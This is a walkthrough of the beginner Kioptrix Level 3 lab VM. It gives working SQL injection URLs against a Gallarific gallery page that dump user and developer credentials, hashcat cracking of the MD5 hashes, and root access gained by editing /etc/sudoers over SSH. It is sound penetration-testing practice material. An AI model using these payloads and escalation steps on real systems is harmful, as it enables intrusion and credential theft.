As with the other two, this challenge is geared towards the beginner. It is however different. Added a few more steps and a new skill set is required. Still being the realm of the beginner I must add. The same as the others, there’s more then one way to “pwn” this one. There’s easy and not so easy. Remember… the sense of “easy” or “difficult” is always relative to ones own skill level. I never said these things were exceptionally hard or difficult, but we all need to start somewhere. And let me tell you, making these vulnerable VMs is not as easy as it looks…
Important thing with this challenge. Once you find the IP (DHCP Client) edit your hosts file and point it to kioptrix3.com
Under Windows, you would edit C:\Windows\System32\drivers\etc\hosts to look something like this:
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost127.0.0.1 static3.cdn.ubi.com
192.168.1.102 kioptrix3.com
Under Linux that would be /etc/hosts
There’s a web application involved, so to have everything nice and properly displayed you really need to this.
Kioptrix: Level 1.2 (#3) VM Download
//add ip of kioptrix level 3 vm to /etc/hosts file
192.168.216.132 kioptrix3.com
//look at source of
http://kioptrix3.com/gallery/gadmin/
//gallarific is present on the webserver
searchsploit Gallarific
http://kioptrix3.com/gallery/gallery.php?id=null and 1=0 union select 1,concat(userid,0x3a,username,0x3a,password),3,4,5,6 from gallarific_users-- -
1:admin:n0t7t1k4
http://kioptrix3.com/gallery/gallery.php?id=null and 1=0 union select 1,column_name,3,4,5,6 from information_schema.columns where table_name='dev_accounts'-- -
http://kioptrix3.com/gallery/gallery.php?id=null and 1=0 union select 1,concat(id,0x3a,username,0x3a,password),3,4,5,6 from dev_accounts-- -
1:dreg:0d3eccfb887aabd50f243b3f155c0f85
2:loneferret:5badcaf789d3d1d09794d8f021f40f0e
//use either online service , john, hashcat for breaking md5
#hashcat -m 0 -a0 file-containing-md5-hash /usr/share/wordlists/rockyou.txt
5badcaf789d3d1d09794d8f021f40f0e:starwars
0d3eccfb887aabd50f243b3f155c0f85:Mast3r
// crackstation.net
0d3eccfb887aabd50f243b3f155c0f85 md5 Mast3r --> dreg
5badcaf789d3d1d09794d8f021f40f0e md5 starwars --> loneferret
//ssh to target machine with loneferret
# sudo ht
edit /etc/sudoers
loneferret ALL=(ALL) ALL
save and exit
# sudo /bin/sh
password: starwars
#root :D